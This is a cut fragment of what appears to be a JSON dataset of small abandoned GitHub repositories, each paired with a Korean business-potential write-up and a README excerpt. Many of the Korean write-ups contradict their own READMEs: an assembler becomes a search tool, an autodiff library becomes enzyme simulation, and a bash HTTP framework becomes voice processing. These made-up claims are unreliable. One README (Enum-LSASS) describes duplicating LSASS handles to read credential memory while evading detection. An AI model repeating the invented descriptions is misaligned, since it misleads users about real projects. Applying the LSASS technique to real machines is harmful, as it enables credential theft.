자신의 사진을 체계적으로 정리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 사진관, 여행사, 부동산 중개소에서 고객 사진을 관리하는 월 구독 ","readme_excerpt":"# PSLab Case\n\nThis repository stores PSLab cases. It is intended to share lasercut designs for Pocket Science Lab.\n\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThe goal of PSLab is to create an Open Source hardware device (open on all layers) and software applications that can be used for experiments by teachers, students and scientists. Our tiny pocket lab provides an array of instruments for doing science and engineering experiments. It provides functions of numerous measurement tools including an oscilloscope, a waveform generator, a frequency counter, a programmable voltage, current source","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"daeken/GrinningSoul","github_url":"https://github.com/daeken/GrinningSoul","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":67,"description":"# GrinningSoul 프로젝트 분석\n\n## 왜 보물인가\n정보가 매우 제한적이어서 이 프로젝트의 가치를 판단하기 어렵지만, 프로젝트명과 낮은 별점으로 볼 때 초기 단계의 실험적 개인 프로젝트로 보입니다.\n\n## 어디에 쓸 수 있나\n**1) 감정 분석 도구**: 텍스트에서 사람의 감정을 읽어내는 서비스로, 고객 피드백 분석에 활용 가능합니다.\n**2) 챗","readme_excerpt":"","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"WICG/eyedropper-api","github_url":"https://github.com/WICG/eyedropper-api","stars":15,"language":"HTML","license":"NOASSERTION","abandonment_months":51,"description":"# EyeDropper API 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 화면에 보이는 색상을 즉시 추출할 수 있는 기술로, 디자인 작업과 색상 선택을 획기적으로 단순화합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 온라인 디자인 도구(그래픽 편집, 로고 메이커)에 색상 선택 기능 통합\n- 실시간 색상 팔레트 생성 및 분석 서비","readme_excerpt":"# EyeDropper API \nAuthors: [Ionel Popescu](https://github.com/ipopescu93), [Sidhika Tripathee](https://github.com/t-sitri), [McKinna Estridge](https://github.com/t-saestr), [Sammy Hannat](https://github.com/samhannat)\n\n## Status of this Document\nThis document is intended as a starting point for engaging the community and standards bodies in developing collaborative solutions fit for standardization. As the solutions to problems described in this document progress along the standards-track, we will retain this document as an archive and use this section to keep the community up-to-date with the most current standards venue and content location of future work and discussions.\n* This document status: **Active**\n* Current venue: [W3C Web Incubator Community Group](https://wicg.io/)\n* Current version: this document\n\n## Introduction\nCurrently on the web, creative application developers are unable to implement an eyedropper, a tool that allows users to select a color from the pixels on their ","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"GovTech-CSG/ProxyAgent","github_url":"https://github.com/GovTech-CSG/ProxyAgent","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":54,"description":"# ProxyAgent 상용화 분석\n\n## 왜 보물인가\n정부 및 기업의 복잡한 시스템들을 중개하는 소프트웨어로, 여러 시스템 간의 통신을 자동으로 관리해주는 핵심 인프라 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **정부기관 SaaS**: 부처 간 민원 처리 시스템을 자동으로 연결하는 통합 플랫폼 (예: 인허가 원스톱 서비스)\n2. **기업 내부 도구**","readme_excerpt":"# Proxy Agent\r\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\r\n\r\nProxy Agent is a tool that is created to ease the proxy connection setup process between a rooted Android device to a computer that is running BurpSuite.\r\n\r\nThe goal of Proxy Agent is to enable a seamless proxy setup experience for Mobile Pentesters/Security Researchers, freeing them from the lengthy proxy setup process and Burp CA Certificate import process, enabling them to spend their time discovering new vulnerabilities instead 😊\r\n\r\nProxy Agent consists of Proxy Agent, an Android Application and Proxy Agent Add-on, a Magisk module.\r\n\r\nThe Android Application provides the UI for the user and holds most of the functions that are needed to run the tool, while the Magisk module helps move Burp's CA Certificate from the user store to the system store.\r\n\r\nThe Magisk module is inspired by [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustU","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"tsarikovskiy/ImageSwapper","github_url":"https://github.com/tsarikovskiy/ImageSwapper","stars":11,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# ImageSwapper 상용화 분석\n\n## 왜 보물인가\n사진 속 특정 물체만 자동으로 교체할 수 있어서 전문가 수준의 이미지 편집을 누구나 간단하게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 웹 서비스**\n- 온라인 이미지 편집 플랫폼: 사용자가 웹브라우저에서 사진을 업로드하고 물체를 선택해 다른 것으로 교체하는 구독형 서비스\n\n*","readme_excerpt":"# ImageSwapper\n\n[![CI Status](http://img.shields.io/travis/tsarikovskiy/ImageSwapper.svg?style=flat)](https://travis-ci.org/tsarikovskiy/ImageSwapper)\n[![Version](https://img.shields.io/cocoapods/v/ImageSwapper.svg?style=flat)](http://cocoapods.org/pods/ImageSwapper)\n[![License](https://img.shields.io/cocoapods/l/ImageSwapper.svg?style=flat)](http://cocoapods.org/pods/ImageSwapper)\n[![Platform](https://img.shields.io/cocoapods/p/ImageSwapper.svg?style=flat)](http://cocoapods.org/pods/ImageSwapper)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n\n## Examples\n![](Example/waterDropExample.gif)\n\nSimply call this method on action button, pass the reference to image view that you want to change and new image:\n```swift\nImageSwapper.waterDrop(image: imageView, toImage: #imageLiteral(resourceName: \"beer.png\"))\n```\n\n## Installation\n\nImageSwapper is available through [CocoaPods](http://cocoapods.org). To install\nit, simply ","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"tenderlove/fisk","github_url":"https://github.com/tenderlove/fisk","stars":7,"language":"Ruby","license":"Apache-2.0","abandonment_months":38,"description":"# Fisk 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 검색 작업을 간단하게 자동화할 수 있는 작은 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터베이스를 빠르게 검색하는 기능이 필요한 웹 서비스에 내장\n- **내부 업무 도구**: 회사 직원들이 대량의 문서나 기록에서 필요한 정보를 빨리 찾을 수 있도록 지원\n- **AP","readme_excerpt":"# Fisk - A Pure Ruby x86-64 Assembler\n\nTired of writing Ruby in Ruby?  Now you can write assembly in Ruby with Fisk!\n\nThis is a pure Ruby x86-64 assembler (I guess).  I'm not 100% sure if it counts\nas pure Ruby because it just reads an XML file and metaprograms most of it.\nAnyway, you can use it to write assembly in Ruby, then have it assembled.\n\nI named it after Wilson Fisk mainly because it reminds me of [this\nproject](https://github.com/seattlerb/wilson) and because I've been playing\nlots of Spider-Man.\n\n## Usage\n\nHere is an example of assembling something:\n\n```ruby\nfisk = Fisk.new\n\nbinary = fisk.asm do\n  push rbp\n  mov rbp, rsp\n  int lit(3)\n  pop rbp\n  ret\nend\n```\n\nFisk uses Intel assembly syntax, so the first operand is the *destination*, and\nthe second operand is the source.  So for example `mov rax, imm8(1)` means \"put\nan immediate that is 8 bits wide with the value of 1 in the RAX register\".\n\n## Sizes and Memory Operands\n\nIn order to select the right x86 instruction to emit, Fi","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"chris-rock/vesper","github_url":"https://github.com/chris-rock/vesper","stars":13,"language":"Shell","license":"Apache-2.0","abandonment_months":79,"description":"# Vesper 저장소 분석\n\n## 왜 보물인가\n2019년 이후 업데이트가 없어 현재 실무에 적용하기 어렵지만, Apache-2.0 라이선스로 자유롭게 개선 및 상용화할 수 있는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 음성 데이터 처리 기반의 자동 필기 또는 요약 서비스\n2. **내부 업무 도구**: 회의록 자동 생성 솔","readme_excerpt":"# Vesper - HTTP Framework for Bash Shell\n\n![Vesper Logo](assets/logo.png)\n\n`vesper` is a collection of shell functions to make it super easy to generate valid http responses. Vesper is not a web server itself, its just the framework to parse http requests and generate valid responses. \n\n## This is crazy, who needs a http framework for unix shell?\n\nThat is a very good question! If you would have asked me that question a year ago, I would have argued: nobody. Now, I am not sure anymore. How will sh/bash scripts work in the future of cloud and serverless? Consider reading my blog [Introducing Vesper - HTTP Framework for Unix Shell](https://lollyrock.com/posts/vesper-intro-bash-shell-http-framework/).\n\n## Get Started\n\n**Hello World**\n\n```bash\nsource \"vesper.sh\"\n\n# parses the http request\nhttp_request\n\n# generate the response\nhttp_response StatusOK \"text/plain\"\necho 'Hello World'\necho $HTTP_REQUEST_URI\n```\n\n**Generate an Image**\n\n```bassh\nsource \"vesper.sh\"\n\nhttp_response StatusOK \"image/jp","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"musikalkemist/praudio","github_url":"https://github.com/musikalkemist/praudio","stars":5,"language":"Python","license":"MIT","abandonment_months":41,"description":"# musikalkemist/praudio 분석\n\n## 왜 보물인가\n음악 파일을 쉽게 처리하고 편집할 수 있는 도구로, 음악 관련 서비스를 만들려는 개발자들에게 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **음악 스트리밍 플랫폼**: Spotify처럼 사용자가 업로드한 음악을 자동으로 분석하고 품질을 최적화하는 기능\n- **팟캐스트 제작 도구**:","readme_excerpt":"# README #\n\n*praudio* provides objects and a script for performing complex \npreprocessing operations on entire audio datasets with one command.\n\n*praudio* is implemented having Deep Learning audio/music applications in mind.\n\nOperations are carried out on CPU. Preprocessing can also be run on-the-fly,\nfor example, while training a model.\n\nThe library uses `librosa` as an audio processing backend.\n\n\n### How do I install the library? ###\n\nYou can install *praudio* both with `pip` via PyPi, and by cloning the \n*praudio* repo from GitHub. \n\nFor both approaches, it's advisable to use a dedicated Python virtual \nenvironment.\n\n#### Installing from PyPi ####\n\nInstalling from PyPi is the easiest option. In the terminal type:\n\n```shell\n$ pip install praudio\n```\n\n#### Installing from GitHub ####\n\nFirst, you should clone the repository from GitHub:\n\n```shell\n$ git clone git@github.com:musikalkemist/praudio.git\n```\n\nThen, move to the project root and, to install the package, type in the terminal:\n`","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"Xiaoming-Zhao/PointNav-VO","github_url":"https://github.com/Xiaoming-Zhao/PointNav-VO","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":27,"description":"# PointNav-VO 상용화 분석\n\n## 왜 보물인가\n로봇이 카메라만으로 실내를 자율적으로 이동하고 목적지를 찾아갈 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **배송 로봇 SaaS**: 아파트·병원·사무실에서 자율배송 로봇이 패키지를 정확히 배달하도록 지원하는 클라우드 서비스\n2. **청소 로봇 API**: 청소기 제조사에 판매","readme_excerpt":"[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n<h1 align=\"center\">PointNav-VO</h1>\n<p align=\"center\">The Surprising Effectiveness of Visual Odometry Techniques for Embodied PointGoal Navigation</p>\n\n<p align=\"center\"><b><a href=\"https://xiaoming-zhao.github.io/projects/pointnav-vo/\">Project Page</a> | <a href=\"https://arxiv.org/abs/2108.11550\">Paper</a></b></p>\n\n\n<p align=\"center\">\n  <img width=\"100%\" src=\"media/nav.gif\"/>\n</p>\n\n## Table of Contents\n\n- [Setup](#setup)\n- [Reproduction](#reproduce)\n- [Plug-and-play](#use-vo-as-a-drop-in-module)\n- [Train](#train-your-own-vo)\n- [Citation](#citation)\n\n## Setup\n\n### Install Dependencies\n\n```bash\nconda env create -f environment.yml\n```\n\n### Install Habitat\n\nThe repo is tested under the following commits of [habitat-lab](https://github.com/facebookresearch/habitat-lab) and [habitat-sim](https://github.com/facebookresearch/habitat-sim).\n```bash\nhabitat-lab == d0db1b55be57abb","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"teetow/elementary_grid","github_url":"https://github.com/teetow/elementary_grid","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":26,"description":"# Elementary Grid 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단한 격자 형태로 정렬해서 보여주는 기능으로, 웹사이트나 앱에서 정보를 깔끔하게 표시해야 하는 모든 곳에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼이나 대시보드를 만드는 회사들이 월 구독료를 받고 이 기술을 포함한 서비스","readme_excerpt":"# Elementary Grid\n\n## A tonegrid synth made with Elementary Audio and React\n\n### Live version\n\nLive version right here: https://teetow.github.io/elementary_grid\n\n### Why?\n\nWith [Nick](https://github.com/nick-thompson) having released the WebAudio part of [Elementary Audio](https://www.elementary.audio/) I started pondering a suitable hobby hack. I recalled [Tonegrid](http://www.tonegrid.com/) (now defunct due to the Flashpocalypse) and especially how addictive it is. After a couple of false starts, I finally managed to get it working. A fresh coat of paint, a couple of options I always wanted, and here it is.\n\n### Known issues and questions\n\n* If you absolutely spray the grid with notes, you'll get some clipping. Aural injury insurance not included.\n* Yes, you can use MIDI input with Elementary Audio. It's that awesome.\n* Yes, you can use it to make VST and AU plugins.\n* Yes, I'll try to make one. Later =)\n\n### Who are you, again?\n\nHi! I'm Johan. I make software, noise and [music](http","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"ReevaJS/reeva","github_url":"https://github.com/ReevaJS/reeva","stars":9,"language":"Kotlin","license":"BSD-2-Clause","abandonment_months":29,"description":"# ReevaJS/reeva 사업화 분석\n\n## 왜 보물인가\n자바스크립트 코드를 자동으로 분석하고 최적화해주는 도구로, 웹 개발자들의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 협업 플랫폼에 내장하여 팀 전체의 코드 품질을 자동으로 관리하는 구독 서비스\n2. **내부 업무 도구**: IT 회사의 개","readme_excerpt":"# ReevaJS\n\nReeva is a JavaScript engine written from scratch using Kotlin. \n\n### Motivation\n\nThe motivation for this project is two-fold. \n\nFirstly, the options for JS engines on the JVM are limited. Nashorn is officially \ndeprecated, and was only ES5. Rhino, while somewhat actively maintained, is a very old\nproject, and thus contribution is hard. As someone who has contributed quite a bit to\na Rhino fork, it is very hard to read. Additionally, some newer features (classes,\nnullish coalescence, optional chaining, etc) have yet to see support.\n\nSecond, I really enjoy JS. Not necessarily from a programming standpoint (I'd much\nrather use TypeScript), however as an engine implementer I think it is fantastic. The\nlanguage specification is the best I've seen from a dynamic language. Being the language\nthat runs the web, the language is extremely active. TC39 is always advancing new proposals,\nand the major engines do a great job of keeping up. \n\nSpeaking of engines, judging from \n[this grea","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"ClockGet/chunibyo","github_url":"https://github.com/ClockGet/chunibyo","stars":6,"language":"C#","license":"MIT","abandonment_months":101,"description":"# ClockGet/chunibyo 상용화 분석\n\n## 왜 보물인가\n시간 정보를 정확하게 가져오고 관리하는 작은 도구로, 시간에 민감한 모든 애플리케이션의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **근태관리 SaaS**: 회사원의 출퇴근 시간을 정확히 기록하는 클라우드 서비스로 판매\n2. **배달앱 API**: 음식배달 플랫폼에 정확한 시","readme_excerpt":"## Chunibyo\n\nChunibyo 根据Listen 1 项目的Python服务器版本进行重写，框架使用了asp.net core2.0版本。\n\n改进：后端使用了mysql数据库保存用户歌单，前端增加了歌词显示、背景图片根据当前播放音乐渐变替换、频谱显示等特效。\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"anmonteiro/aws-lambda-ocaml-runtime","github_url":"https://github.com/anmonteiro/aws-lambda-ocaml-runtime","stars":5,"language":"OCaml","license":"BSD-3-Clause","abandonment_months":39,"description":"# aws-lambda-ocaml-runtime 분석\n\n## 왜 보물인가\nAmazon 클라우드 서비스에서 OCaml이라는 프로그래밍 언어로 자동화 작업을 만들 수 있게 해주는 드문 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 금융 데이터 분석이나 복잡한 계산이 필요한 웹 서비스를 클라우드에서 자동으로 처리\n2. **내부 업무 도구","readme_excerpt":"# OCaml Runtime for AWS Lambda\n\nThis package provides a [custom\nruntime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html) for\nAWS Lambda.\n\n## Installation\n\nThis repository provides two libraries:\n\n- `lambda-runtime` provides a runtime and API for\n  [AWS Lambda](https://aws.amazon.com/lambda/) and\n  [API Gateway](https://aws.amazon.com/api-gateway/).\n- the `vercel` library depends on `lambda-runtime` and provides an interface to\n  the [Vercel](https://vercel.com/) service that resembles a request / response\n  exchange.\n\n\nThe libraries in this repo are released to the OPAM package registry.\n\nYou can depend on them via:\n\n1. [__esy__](esy): `esy add @opam/lambda-runtime` and / or `esy add @opam/vercel`\n2. [__OPAM__](opam): `opam install lambda-runtime vercel`.\n\n[esy]: https://esy.sh\n[opam]: https://opam.ocaml.org\n\n## Example function\n\nSee the [`examples`](./examples) folder.\n\n## Deploying\n\n**Note**: Based on the instructions in this [blog\npost](https://aws.amazon.com/blog","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"softprops/cargo-thanks","github_url":"https://github.com/softprops/cargo-thanks","stars":7,"language":"Rust","license":"MIT","abandonment_months":88,"description":"# cargo-thanks 분석 보고서\n\n## 왜 보물인가\n프로그래밍 프로젝트에서 사용한 외부 라이브러리 제작자들을 자동으로 찾아 감사를 표할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 오픈소스 라이선스 관리 플랫폼에서 자동 기여자 인정 기능 제공\n2. **내부 업무 도구**: 대기업의 법무팀이 사용한 오픈소스 출처를 자","readme_excerpt":"# cargo thanks\n\nGive thanks (in the form of [github stars](https://help.github.com/articles/about-stars/)) to your fellow Rustaceans\n\n![thanks](thanks.gif)\n\n## Install\n\nThis is intended to be installed as a [cargo](http://doc.crates.io/index.html) plugin\n\n```bash\n$ cargo install --force cargo-thanks\n```\n\n(adding the `--force` upgrades to the latest version when installing)\n\n### usage\n\nCreate a [github access token](https://github.com/settings/tokens) with the \"public_repo\" permission and\nstore its value in an env variable named `GITHUB_TOKEN`\n\nWithin any of your Cargo based Rust projects, run the following\n\n```bash\n$ cargo thanks\n```\n\nThis will find all of your Cargo dependencies, find their github.com repository from metadata hosted on crates.io, and star their github repositories. This was\ninspired in part by medium's clapping button as a way to show thanks for someone elses work you've found enjoyment in.\n\nIf you're asking why did some dependencies get thanked and not others, the an","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"RuiAAPeres/Receiver","github_url":"https://github.com/RuiAAPeres/Receiver","stars":5,"language":"Swift","license":"MIT","abandonment_months":84,"description":"# Receiver 저장소 분석\n\n## 왜 보물인가\n데이터나 신호를 받아서 처리하는 기술로, 실시간 정보 수집이 필요한 여러 산업에서 바로 활용할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **IoT 모니터링 SaaS**: 센서에서 전송되는 온도, 습도, 에너지 사용량 등을 실시간으로 수집하고 대시보드에 표시하는 서비스\n- **금융 데이터 수","readme_excerpt":"# Receiver\n\n<a href=\"https://github.com/Carthage/Carthage\"><img src=\"https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat\"></a>\n<a href=\"https://github.com/RuiAAPeres/Receiver#cocoapods\"><img src=\"https://img.shields.io/cocoapods/v/Receiver.svg?style=flat\"></a>\n[![codecov](https://codecov.io/gh/RuiAAPEres/Receiver/branch/master/graph/badge.svg)](https://codecov.io/gh/RuiAAPeres/Receiver)\n[![Build Status](https://travis-ci.org/RuiAAPeres/Receiver.svg?branch=master)](https://travis-ci.org/RuiAAPeres/Receiver)\n[![Swift 4.1](https://img.shields.io/badge/Swift-4.1-orange.svg?style=flat)](https://developer.apple.com/swift/)\n[![License MIT](https://img.shields.io/badge/License-MIT-lightgrey.svg?style=flat)](https://opensource.org/licenses/MIT)\n\n\n1. [Intro](https://github.com/RuiAAPeres/Receiver#intro)\n2. [🌈 Enter `Receiver`! 🌈](https://github.com/RuiAAPeres/Receiver#-enter-receiver-)\n3. [Adding as a Dependency 🚀](https://github.com/RuiAAPeres/Receiver#adding-as-a-dependency-","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"rust-ml/oxide-enzyme","github_url":"https://github.com/rust-ml/oxide-enzyme","stars":17,"language":"Rust","license":"Apache-2.0","abandonment_months":40,"description":"# Oxide-Enzyme 프로젝트 분석\n\n## 왜 보물인가\n생물학적 효소의 동작 원리를 컴퓨터 프로그래밍으로 구현한 도구로, 복잡한 화학 반응 시뮬레이션을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **신약 개발 회사의 SaaS 플랫폼**: 신약 후보 물질의 효능을 빠르게 예측하는 웹 서비스로 제공\n2. **제약·화학사의 내부 업무 도구**:","readme_excerpt":"# <img src=\"https://enzyme.mit.edu/logo.svg\" width=\"75\" align=left> ARCHIVED \n\n## Please look at https://github.com/EnzymeAD/rust\n\n\nThis is a package containing a Rust frontend for [Enzyme](https://github.com/wsmoses/enzyme). This is very much a work in progress and bug reports/discussion is greatly appreciated!\n\nEnzyme is a plugin that performs automatic differentiation (AD) of statically analyzable LLVM. It is highly-efficient and its ability perform AD on optimized code allows Enzyme to meet or exceed the performance of state-of-the-art AD tools.\n  \n# Supported types\n- Scalars  \n- Structs, Unions  \n- Tuple, Array, Vec  \n- Box, Reference, Raw pointer  \n\nWe are working on adding support for dyn trait objects, slices and enums.  \nAdding Generics to your types or implementing traits is already working fine.\n\n\n# Setup\nFirst you have to get an adequate rustc/llvm/enzyme build here: [enzyme\\_build](https://github.com/ZuseZ4/enzyme\\_build).  \nAfterwards for your convenience you should expor","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"rawrmaan/restyped","github_url":"https://github.com/rawrmaan/restyped","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":95,"description":"# rawrmaan/restyped 가치 평가\n\n## 왜 보물인가\n웹 개발자들이 API를 만들 때 필요한 설정 작업을 자동화해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: API 기반 데이터 분석 플랫폼이 이 도구를 내장하여 고객들의 개발 속도 향상\n2. **내부 업무 도구**: 대기업 IT팀","readme_excerpt":"<p align=\"center\">\n  <img src=\"/images/logo.png\" width=\"350\"/>\n</p>\n<p align=\"center\">\n  End-to-end typing for REST APIs with TypeScript\n</p>\n\n## Motivation\n\n[Read the blog post](https://blog.falcross.com/introducing-restyped-end-to-end-typing-for-rest-apis-with-typescript/)\n\n## Benefits\n\n- **End-to-end typing.** Share request and response types between your client\n  and server for ease of use and peace of mind.\n- **Unopinionated.** Works with any new or existing REST API.\n- **Universal.** Can support any server framework or REST client.\n- **~~Lightweight~~ Weightless.** Client and server implementations add no runtime code--It's Just Types™.\n- **Use existing syntax.** Declare and call your routes the same way you always\n  have.\n- **Great for private APIs.** Keep API clients across your organization in sync\n  with the latest changes.\n- **Great for public APIs.** Create a RESTyped definition so TypeScript users\n  can consume your API fully typed.\n- **Easy to learn and use.** Start using","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"Enzodtz/atomize-vscode","github_url":"https://github.com/Enzodtz/atomize-vscode","stars":17,"language":"","license":"MIT","abandonment_months":61,"description":"# Enzodtz/atomize-vscode 분석\n\n## 왜 보물인가\nVS Code(프로그래머가 쓰는 글 작성 프로그램) 확장 기능으로, 반복적인 작업을 자동화해주어 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀을 둔 스타트업/기업에 월 구독형 VS Code 확장 플러그인으로 판매\n2. **내부","readme_excerpt":"# atomize-vscode\nTune vscode with atom's minimalistic design\n\n![image](https://user-images.githubusercontent.com/7780770/120245436-91399700-c243-11eb-9f25-1fdeb6896f12.png)\n\n## Getting Started\n\n### Install Atom One Dark Theme for VSCode\n\nGet it from [here](https://marketplace.visualstudio.com/items?itemName=akamud.vscode-theme-onedark), or type `Ctrl+P` inside vscode and execute:\n\n```\next install akamud.vscode-theme-onedark\n```\n\n### Install Material Icon Theme for VSCode\n\nGet it from [here](https://marketplace.visualstudio.com/items?itemName=PKief.material-icon-theme), or type `Ctrl+P` inside vscode and execute:\n\n```\next install PKief.material-icon-theme\n```\n\n### Install Customize UI extension for VSCode\n\nGet it from [here](https://marketplace.visualstudio.com/items?itemName=iocave.customize-ui), or type `Ctrl+P` inside vscode and execute:\n\n```\next install iocave.customize-ui\n```\n\n### Install Atom's font in your system\n\nGet it from [this](https://nodnod.net/posts/inconsolata-dz/) link ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"devadvent/readme","github_url":"https://github.com/devadvent/readme","stars":14,"language":"","license":"unknown","abandonment_months":54,"description":"# devadvent/readme 분석\n\n## 왜 보물인가\n개발자들을 위한 학습 자료나 커뮤니티 기반 콘텐츠를 체계적으로 정리한 문서로, 지식을 공유하고 접근성을 높이는 데 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 개발 입문자를 위한 무료/유료 강의 자료로 패키징하여 구독 서비스 제공\n2. **기업 내부 교육 도구*","readme_excerpt":"![](dac2021.jpg)\n\n# 🎅 Dev Advent Calendar\n\n[![Dev Advent Calendar Video Explaination](./youtube.jpg)](https://www.youtube.com/watch?v=AmtkdsTcHTo)\n\n## The idea 💡\n\nThe **Dev Advent Calendar** is an initiative by [@themarcba](https://twitter.com/themarcba) in order to give back to the community and learn something on the way.\n\nFor every day from the **1st to the 24th of December**, I will push an Xmas-themed coding puzzle as a repository to this organization. A demo puzzle is at [devadvent/2021-puzzle-0](https://github.com/devadvent/2021-puzzle-0).\n\nYour code will remain private and can only be seen by me. However, I might show the code of the accepted solution in a repository or on my Twitter feed ([@themarcba](https://twitter.com/themarcba)).\n\nFor every puzzle, the winner will be picked **at random** from **all valid solutions**. Most puzzles will provide tests, so you can verify your solution with `yarn test`/`npm test`. (More to this, check out the [guide on how to participate](CONTR","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"kartikdurg/Enum-LSASS","github_url":"https://github.com/kartikdurg/Enum-LSASS","stars":10,"language":"C","license":"MIT","abandonment_months":55,"description":"# Enum-LSASS 저장소 분석\n\n## 왜 보물인가\nWindows 보안 시스템의 사용자 정보를 추출하는 도구로, 기업의 보안 감시 및 침입 탐지 시스템 구축에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 감시 SaaS**: 기업 네트워크의 불법 접근을 실시간으로 감지하고 알림하는 구독형 보안 서비스\n2. **내부 업무 도구**: IT","readme_excerpt":"# Enum-LSASS\nThe idea behind this emulation is to simply do not invoke `OpenProcess` to get handle with appropriate rights but, use the already opened handle to LSASS from other processes. Similar to `pypykatz`, this binary written in C-lang gets a copy of already open LSASS handle from a foreign process and copies this handle into our own process using `NtDuplicateObject` to access LSASS. This also sets `PROCESS_VM_READ` for `DesiredAccess`.\n\nThis method can succeed because of two possible reasons:\n\n- A random process has an open handle to LSASS, and access this process via debug privileges.\n- LSASS itself has an open handle to LSASS by default. But, how is this different then the normal method? `OpenProcess` in `mimikatz` calls with that one specific flag value `PROCESS_ALL_ACCESS` to read process memory. This method doesn't use that specific flag value therefore bypasses this filtering.\n\nReason behind porting this feature from `pypykatz` to C-Lang:\n\n- Replace the LSASS enumeration i","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"GauravRajwada/100-Data-Science-Projects","github_url":"https://github.com/GauravRajwada/100-Data-Science-Projects","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":58,"description":"# 100-Data-Science-Projects 분석\n\n## 왜 보물인가\n데이터 분석을 배우고 싶은 사람들을 위해 실제 프로젝트 100개를 한 곳에 모아놓은 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼 SaaS**: 데이터 분석 강의를 위한 실습 프로젝트 템플릿으로 월 구독 서비스 제공\n2. **기업 직원 교육 도구**:","readme_excerpt":"# 100-Data-Science-Projects\n100 Data Science projects for anybody who is interested in doing research and want to learn about data science by building projects and coding them. \n\nThe goal is to make a repository where anyone can contribute their research,projects and solution that is useful for everyone and can help in their journey of learning Data Science.\n\nInstructions to contribute are as follows:\n\nPropose your project,research  create an issue if you want write what you think should be added or whta you wanna work on.\n\nThen you or anyone can  make the project on it or you can contribute your own research on that project.\n\nAfter that anyone will fork the repo, write up the code and solution, \nThen submit a pull request. \n\nThe code and project will be scrutinized, reviewed, andthe suggestions will be made \nthen the project will be included (merge) into the main project repo.\n\nAnybody can suggest any changes or improvements if needed , for this one has to create the issue for that pa","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"fabianfett/swift-aws-lambda","github_url":"https://github.com/fabianfett/swift-aws-lambda","stars":12,"language":"Swift","license":"Apache-2.0","abandonment_months":73,"description":"# swift-aws-lambda 분석\n\n## 왜 보물인가\n아마존 클라우드 컴퓨팅 서비스에서 가볍고 빠르게 작동하는 프로그램을 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 애플리케이션에서 사용자 요청을 처리하는 백엔드 기능을 저렴하게 운영\n- **내부 업무 도구**: 회사 내부에서 자동으로 반복되는 업무(데이","readme_excerpt":"# swift-lambda-runtime\n\n⚠️ This project is unmaintained legacy code, that never reached a version 1.0. It has been obsoleted by the 